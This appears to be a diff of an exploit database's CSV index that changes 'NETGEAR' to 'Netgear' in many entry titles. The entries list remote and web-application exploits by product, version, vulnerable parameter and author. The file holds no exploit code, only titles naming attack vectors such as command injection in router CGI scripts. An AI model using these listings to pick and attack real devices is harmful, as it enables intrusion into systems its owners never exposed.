22453,exploits/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware,
22453,exploits/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware,
22454,exploits/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",remote,linux,
22455,exploits/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware,
22455,exploits/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware,
22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,
22466,exploits/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Remote Stack Overflow ROP-Based (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",remote,windows,
22468,exploits/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,remote,unix,
@ -15302,7 +15303,7 @@ id,file,description,date,author,type,platform,port
24133,exploits/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,remote,windows,
24136,exploits/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",remote,linux,
24137,exploits/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",remote,multiple,
24140,exploits/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware,
24140,exploits/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware,
24148,exploits/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",remote,multiple,
24149,exploits/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,remote,php,
24187,exploits/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,remote,windows,
@ -15469,7 +15470,7 @@ id,file,description,date,author,type,platform,port
24904,exploits/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,windows,
24905,exploits/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,multiple,
24907,exploits/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",remote,windows,
24931,exploits/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware,
24931,exploits/hardware/remote/24931.rb,"Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware,
24935,exploits/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux,
24936,exploits/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,remote,hardware,
24937,exploits/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux,
@ -15486,7 +15487,7 @@ id,file,description,date,author,type,platform,port
24961,exploits/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,remote,windows,
24963,exploits/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",remote,multiple,50000
25091,exploits/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",remote,multiple,
24974,exploits/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware,
24974,exploits/hardware/remote/24974.rb,"Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware,
24976,exploits/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,remote,multiple,
24979,exploits/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",remote,multiple,
24980,exploits/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple,
@ -15942,14 +15943,14 @@ id,file,description,date,author,type,platform,port
29035,exploits/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,remote,windows,
29045,exploits/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",remote,windows,
29083,exploits/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",remote,windows,
29096,exploits/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows,
29096,exploits/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows,
29127,exploits/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,remote,hardware,80
29129,exploits/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,remote,windows,12397
29130,exploits/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,remote,windows,8080
29132,exploits/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,remote,unix,80
29160,exploits/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",remote,linux,
29146,exploits/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",remote,windows,
29167,exploits/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows,
29167,exploits/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows,
29171,exploits/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,remote,windows,
29210,exploits/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,remote,php,80
29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,remote,hardware,8080
@ -16034,7 +16035,7 @@ id,file,description,date,author,type,platform,port
29807,exploits/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow",2007-03-31,"Stefan Esser",remote,php,
29808,exploits/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",remote,php,
29814,exploits/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",remote,windows,
29815,exploits/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443
29815,exploits/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443
29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple,
29952,exploits/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,remote,windows,
29840,exploits/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",remote,windows,
@ -16151,7 +16152,7 @@ id,file,description,date,author,type,platform,port
30645,exploits/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",remote,windows,
30650,exploits/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",remote,hardware,
30652,exploits/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",remote,hardware,
30673,exploits/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware,
30673,exploits/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware,
30677,exploits/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",remote,linux,
30678,exploits/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",remote,multiple,
30692,exploits/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,remote,windows,
@ -16525,7 +16526,7 @@ id,file,description,date,author,type,platform,port
33164,exploits/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,remote,multiple,
33165,exploits/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,remote,hardware,
33172,exploits/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",remote,windows,
33177,exploits/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware,
33177,exploits/hardware/remote/33177.txt,"Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware,
33192,exploits/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",remote,multiple,
33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,
33207,exploits/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Remote Buffer Overflow",2009-09-01,"optix hacker",remote,windows,
@ -16941,7 +16942,7 @@ id,file,description,date,author,type,platform,port
35806,exploits/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",remote,windows,
35809,exploits/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,remote,windows,
35810,exploits/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",remote,linux,
35817,exploits/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware,
35817,exploits/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware,
35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",remote,multiple,
35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",remote,windows,
35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,remote,linux,
@ -17326,7 +17327,7 @@ id,file,description,date,author,type,platform,port
39074,exploits/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",remote,cgi,
39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows,
39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple,
39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware,
39089,exploits/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware,
39102,exploits/windows/remote/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,remote,windows,
39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,
39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple,
@ -17361,7 +17362,7 @@ id,file,description,date,author,type,platform,port
39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",remote,jsp,
39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux,
39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80
39515,exploits/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080
39515,exploits/windows/remote/39515.rb,"Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080
39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,
39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,remote,php,80
39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,remote,hardware,443
@ -17490,8 +17491,8 @@ id,file,description,date,author,type,platform,port
40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,remote,windows,
40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40736,exploits/hardware/remote/40736.txt,"Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40737,exploits/hardware/remote/40737.sh,"Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,remote,linux_mips,7547
40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows,
@ -17517,7 +17518,7 @@ id,file,description,date,author,type,platform,port
40916,exploits/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",remote,linux,
40920,exploits/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",remote,linux,
40930,exploits/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,remote,osx,
40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80
40949,exploits/cgi/remote/40949.rb,"Netgear WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80
40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22
40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,
40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,
@ -17545,7 +17546,7 @@ id,file,description,date,author,type,platform,port
41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",remote,windows,
41545,exploits/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Remote Buffer Overflow",2017-03-07,"Peter Baris",remote,windows,
41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows,
41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
41598,exploits/cgi/remote/41598.rb,"Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800
41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080
43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
@ -17636,7 +17637,7 @@ id,file,description,date,author,type,platform,port
41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,
42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
41719,exploits/hardware/remote/41719.rb,"Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,
41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows,
41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple,
@ -17694,7 +17695,7 @@ id,file,description,date,author,type,platform,port
42186,exploits/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",remote,windows,
42222,exploits/windows/remote/42222.py,"SpyCamLizard 1.230 - Remote Buffer Overflow",2017-06-20,abatchy17,remote,windows,
42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443
42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80
42257,exploits/cgi/remote/42257.rb,"Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80
42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,remote,windows,10000
42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java,
42288,exploits/android/remote/42288.txt,"BestSafe Browser - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
@ -17820,7 +17821,7 @@ id,file,description,date,author,type,platform,port
44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
44245,exploits/hardware/remote/44245.rb,"Netgear - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
@ -20763,7 +20764,7 @@ id,file,description,date,author,type,platform,port
5062,exploits/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,webapps,php,
5064,exploits/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,webapps,php,
5065,exploits/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,webapps,php,
5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",webapps,php,
5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php,
5068,exploits/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,webapps,php,
5070,exploits/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,webapps,php,
5071,exploits/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,webapps,php,
@ -27356,7 +27357,7 @@ id,file,description,date,author,type,platform,port
17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware,
17872,exploits/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",webapps,php,
17873,exploits/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",webapps,windows,
17874,exploits/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware,
17874,exploits/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware,
17882,exploits/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,webapps,php,
17887,exploits/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php,
17888,exploits/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php,
@ -29334,7 +29335,7 @@ id,file,description,date,author,type,platform,port
24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,
24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x Comment Module - 'CM_pid' Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php,
24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",webapps,windows,
24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware,
24441,exploits/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware,
24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,webapps,php,
24433,exploits/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,webapps,php,
24435,exploits/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,webapps,hardware,
@ -29352,7 +29353,7 @@ id,file,description,date,author,type,platform,port
24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,webapps,php,
24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,webapps,php,
24462,exploits/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,webapps,php,
24464,exploits/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware,
24464,exploits/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware,
24465,exploits/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,webapps,php,
24466,exploits/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,webapps,hardware,
24510,exploits/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php,
@ -29379,7 +29380,7 @@ id,file,description,date,author,type,platform,port
24506,exploits/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,webapps,php,
24507,exploits/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",webapps,php,
24512,exploits/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php,
24513,exploits/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware,
24513,exploits/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware,
24514,exploits/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,webapps,php,
24515,exploits/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,webapps,php,
24516,exploits/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",webapps,php,
@ -29580,7 +29581,7 @@ id,file,description,date,author,type,platform,port
24913,exploits/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",webapps,php,
